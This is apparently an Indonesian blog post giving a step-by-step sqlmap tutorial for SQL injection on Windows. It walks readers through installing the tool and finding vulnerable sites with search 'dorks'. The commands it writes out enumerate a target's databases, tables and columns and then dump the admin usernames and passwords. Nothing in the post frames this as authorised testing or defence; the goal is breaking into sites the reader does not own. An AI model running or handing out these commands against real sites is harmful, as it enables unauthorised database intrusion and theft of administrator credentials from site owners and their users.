Sqlmap yaitu salah satu tool untuk melakukan penetrasi pada suatu website dengan teknik SQL Injection. Tool ini bersifat free, mungkin pengguna windows sudah kenal dengan havij, sama fungsinya seperti havij bedanya tool ini jalan di console sedangkan havij dengan GUI nya yang tinggal klak-klik saja untuk melakukan penetrasi.
Sebelum mulai membaca disini saya akan menjelaskan sedikit perintah CMD yang akan di gunakan pada tutorial kali ini :
1. -u yaitu untuk menunjukkan URL target.
2. --dbs yaitu untuk membuka DATABASE target.
3. --tables yaitu untuk membuka TABEL pada DATA BASE target.
4. -D yaitu penunjukkan pada DATA BASE target
5. --columns yaitu untuk membuka COLUMNS pada TABEL data base
6. -T yaitu penunjukkan pada TABEL data base
7. --dump yaitu untuk membuka DATA pada COLUMN yang terdapat pada TABEL database.
8. -C yaitu menunjukkan pada COLUMNS tabel
Bahan-Bahan :
1. python ( download sesuai bit windows kalian ) kalo saya versi 27
2. SQLmap ( banyak di google )
3. Command Prompt
Langkah-Langkah :
- install python di drive C: dengan nama folder python27 ( ini default nya begini )
- setelah terinstall, lalu extract Folder SQLmap ke dalam folder python27 tadi .. ( taruh di Drive C: folder python27 )
- lalu buka command prompt, pasti udah taulah buka CMD gimana :v
- untuk memanggil python nya .. anda harus berada dalam C:\ ketik perintah :
cd python27 (enter)
- setelah berada dalam C:\python27. Lalu tinggal memanggil SQLmapnya. tadikan kita taruh folder SQLmap nya di python27..
jadi perintahnya ketik :
cd sqlmap (enter)
maka akan begini C:\python27\sqlmap (berarti sukses,tinggal cari target pakai dork SQL)
- disini kita anggap anda sudah punya TARGET yang Mysqlnya error ..
ketik perintah :
sqlmap.py -u http://target.com/php?id=32 lalu enter! tunggu sampai selesai..
- lalu setelah mendapat informasi dari target (terkoneksi dengan target) tinggal kita cari DATABASE nya..
ketik :
sqlmap.py --dbs -u http://target.com/php?id=32 lalu enter!
tunggu hingga muncul data base nya. biasanya nama data base nya diatas tulisan information_schema
- setelah itu setelah kita tau DATABASE nya tinggal kita lihat isi TABELnya
ketik perintah :
sqlmap.py --tables -D (nama data base target) -u http://target.com/php?id=32
tunggu hingga selesai dan muncul TABELnya,
- setelah anda tahu ada TABEL apa aja disitu, yang kita cari adalah ADMIN, atau USERADMIN dll. yang berhubungan admin. yang kita lakukan selanjutnya adalah mencari COLUMN pada tabel,
contoh disini TABEL yang kita ambil yaitu ADMIN .
ketik perintah :
sqlmap.py --columns -T ADMIN -D (nama data base target) -u http://target.com/php?id=32
tunggu hingga muncul COLUMN pada TABEL ADMIN tadi..
- setelah muncul COLUMN nya , misalkan disitu ada COLUMN , username dan password
selanjut nya kita DUMP COLUMN username dan password tersebut.
ketik perintah :
sqlmap.py --dump -C username,password -T ADMIN -D (nama data base target) -u http://target.com/php?id=32
gunakan tanda KOMA tanpa SPASI untuk menyekatnya seperti diatas tadi kan :
username,password
- maka akan muncul username dan password
kalo password nya belum di hash , kemudian hash password
sekian dan terima kasih.
maaf cuma segini yang aku bisa sampaikan.
NOTE : PENULISAN HARUS BENAR DAN SESUAI YANG ADA PADA COMMAND PROMPT
0 komentar:
Posting Komentar